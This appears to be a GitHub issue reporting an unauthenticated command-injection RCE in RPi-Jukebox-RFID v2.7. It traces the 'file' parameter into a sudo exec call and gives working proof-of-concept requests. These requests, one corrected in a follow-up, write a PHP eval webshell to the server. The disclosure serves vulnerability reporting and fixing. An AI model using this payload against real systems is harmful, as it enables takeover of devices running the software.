🐛 | RPi-Jukebox-RFID V2.7_RCE_2

[xjzzzxx]

Version

v2.7.0

Branch

released

OS

ubuntu 22

Pi model

unknown

Hardware

No response

What happened?

Hello,

I would like to report for a RCE vulnerability in RPi-Jukebox-RFID-v2.7(No permissions required)

Analysis

The path of the vulnerability: htdocs\api\playlist\appendFileToPlaylist.php

# htdocs\api\playlist\appendFileToPlaylist.php
$file = $_GET["file"]; // Line 26(Source)
if ($file !== "") {
    print "Playing file " . $file;
    execScriptWithoutCheck("playout_controls.sh -c=playlistappend -v='$file'");     // Line 29(Sink)
}
# htdocs\api\common.php
exec("sudo ".$absoluteCommand); // Line 25 (Sink)

Source from Line 26 ($_GET['file']).

And then there are no check point.

Finally, the source(tainted) pass to exec("sudo ".$absoluteCommand);(Line 25 in htdocs\api\common.php) without another check.

Poc

GET /htdocs/api/playlist/appendFileToPlaylist.php?file=hello%27+%3b+echo+%22%3c%3fphp+%40eval(%24_POST%5b%27pass%27%5d)+%3f%3e%22++%3e+.%2fshell2.php++%3b+echo+%27hello

Here is the version without url encoding for ease of understanding:

GET /htdocs/api/playlist/appendFileToPlaylist.php?file=hello' ; echo "<?php @eval($_POST['pass']) ?>" > ./shell2.php ; echo 'hello

Manual verification

The attacker can then easily connect to this webshell(/htdocs/api/playlist/shell2.php)

Logs

No response

Configuration

No response

More info

No response

[xjzzzxx]

I'm sorry for the issue with the PoC I wrote earlier. I forgot to escape @, which resulted in the generated webshell being unusable. Here is the correct PoC:

Poc_fixed

GET /htdocs/api/playlist/appendFileToPlaylist.php?file=hello%27+%3b+echo+%22%3c%3fphp+%40eval(%5c%24_POST%5b%27shell2%27%5d)+%3f%3e%22++%3e+.%2fshell2.php++%3b+echo+%27hello

Here is Data without url encoding for ease of understanding:

GET /htdocs/api/playlist/appendFileToPlaylist.php?file=hello' ; echo "<?php @eval(\$_POST['shell2']) ?>" > ./shell2.php ; echo 'hello

Manual verification